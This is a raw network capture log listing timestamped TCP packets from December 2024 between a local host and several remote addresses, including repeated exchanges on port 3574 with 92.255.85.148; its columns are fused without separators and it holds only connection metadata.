                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.571736097 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.579910040 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.580276966 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.580302000 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.588550091 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.588634968 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.588655949 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.596568108 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.596693993 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.596709967 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.603451967 CET44349741162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.603609085 CET44349742162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.603821993 CET49741443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.603837967 CET44349741162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.603950977 CET49742443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.603966951 CET44349742162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.604857922 CET44349741162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.604968071 CET49741443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.605003119 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.605026960 CET44349742162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.605078936 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.605078936 CET49742443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.605102062 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.606326103 CET49741443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.606388092 CET44349741162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.606508970 CET49741443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.606515884 CET44349741162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.606936932 CET49742443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.607012987 CET44349742162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.607089996 CET49742443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.613037109 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.613146067 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.613163948 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.620882988 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.621051073 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.621067047 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.628896952 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.629030943 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.629053116 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.637077093 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.637157917 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.637181997 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.644712925 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.644799948 CET49740443192.168.2.11172.217.17.65
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.644819021 CET44349740172.217.17.65192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:41.647331953 CET44349742162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.342135906 CET49743443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.374057055 CET49743443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.374145031 CET44349743162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.374207020 CET49743443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.381957054 CET44349744162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.382302999 CET49744443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.382333994 CET44349744162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.383399963 CET44349744162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.383476973 CET49744443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.387255907 CET49744443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.387367964 CET44349744162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.387497902 CET49744443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.387514114 CET44349744162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.435858965 CET49744443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.573750973 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.573880911 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.573895931 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.573940992 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.573968887 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.573971987 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.574182987 CET497273574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.624779940 CET49744443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.624881029 CET44349744162.159.61.3192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.624931097 CET49744443192.168.2.11162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.696911097 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:42.696926117 CET35744972792.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:47.577311039 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:47.700890064 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:47.701018095 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:47.701093912 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:47.820975065 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:49.076473951 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:49.076491117 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:49.076603889 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:49.085041046 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:49.204530954 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:49.523375034 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:49.523659945 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:49.643136978 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:49.998050928 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:50.000978947 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:50.120531082 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:50.120641947 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:50.241228104 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:50.608731985 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:50.613228083 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:50.732731104 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:50.732872009 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:50.853195906 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.220319986 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.223611116 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.223663092 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.223670006 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.223690033 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.223722935 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.223726988 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.232011080 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.232072115 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.232110023 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.239425898 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.239500999 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.239518881 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.247807026 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.247858047 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.247920036 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.252768993 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.252872944 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.252890110 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.261281967 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.261312962 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.261394024 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.415618896 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.415819883 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.415944099 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.419662952 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.419771910 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.740088940 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.740128994 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.740195036 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.745929003 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.746037960 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.746098042 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.751832008 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.751852989 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.751920938 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.799209118 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.799304962 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.799386024 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.801647902 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.802365065 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.802423954 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.802484989 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.807123899 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.807184935 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.807238102 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.811810017 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.811882973 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.811911106 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.816209078 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.816260099 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.816364050 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.820561886 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.820643902 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.820647001 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.824784994 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.824856997 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.824871063 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.828949928 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.828998089 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.829058886 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.833075047 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.833122015 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.833146095 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.836893082 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.836949110 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.836987972 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.840750933 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.840836048 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.840837955 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.844547033 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.844618082 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.844677925 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.848283052 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.848381996 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.848443031 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.851994991 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.852129936 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.852179050 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.855570078 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.855633974 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.855658054 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.859163046 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.859246969 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.859252930 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.862724066 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.862782001 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.862838984 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.866221905 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.866281033 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.866331100 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.869740009 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.869817019 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.869841099 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.871994019 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.872045040 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.872092962 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.873864889 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:51.873927116 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.279990911 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.399573088 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.399629116 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.519262075 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.952868938 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.952915907 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.954708099 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.954834938 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.954880953 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.956732988 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.956877947 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.956922054 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.958795071 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.958909035 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.958954096 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.960804939 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.960875988 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.960921049 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.962883949 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.963041067 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.963083982 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.964859962 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.964932919 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.964998007 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.966984034 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.967081070 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.967156887 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.968969107 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.969083071 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.969137907 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.971004963 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.971086979 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.971163034 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.973371983 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.973432064 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.973490953 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.975091934 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.975265980 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.975337982 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.977267027 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.977328062 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.977497101 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.979147911 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.979252100 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.979293108 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.981204987 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.981300116 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.981379986 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.983247042 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.983412981 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.983542919 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.985260963 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.985389948 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.985461950 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.987323046 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.987435102 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.987492085 CET497463574192.168.2.1192.255.85.148
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.989329100 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.989559889 CET35744974692.255.85.148192.168.2.11
                                                                                                                                                                                                                                                                                                        Dec 18, 2024 14:55:54.989645004 CET497463574192.168.2.1192.255.85.148
